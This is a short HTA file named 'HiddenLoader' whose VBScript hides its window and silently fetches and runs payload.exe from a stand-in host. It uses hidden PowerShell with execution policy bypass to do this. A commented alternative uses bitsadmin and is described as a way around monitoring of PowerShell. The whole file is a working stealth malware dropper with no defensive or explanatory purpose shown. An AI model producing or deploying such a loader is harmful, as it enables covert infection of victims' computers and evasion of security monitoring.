<hta:application
  id="oHTA"
  applicationname="HiddenLoader"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="minimize"
  singleinstance="yes"
  navigable="no"
  sysmenu="no"
  contextmenu="no"
  innerborder="no"
  scroll="no"
/>

<script language="VBScript">
  ' ==== Ensure window never appears ====
  Window.resizeTo 0, 0
  Window.moveTo -2000, -2000
  Set objShell = CreateObject("Wscript.Shell")

  ' ==== Method 1: Direct silent execution (best) ====
  objShell.Run "cmd /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""$url='https://example.com/payload.exe';$out='%temp%\payload.exe';Invoke-WebRequest $url -OutFile $out;Start-Process -WindowStyle Hidden $out""", 0, False

  ' ==== Method 2: Alternative (if PowerShell is monitored) ====
  ' objShell.Run "cmd /c bitsadmin /transfer payload /download /priority high https://example.com/payload.exe %temp%\payload.exe && start /b %temp%\payload.exe", 0, False

  ' ==== Close HTA immediately ====
  Self.Close()
</script>
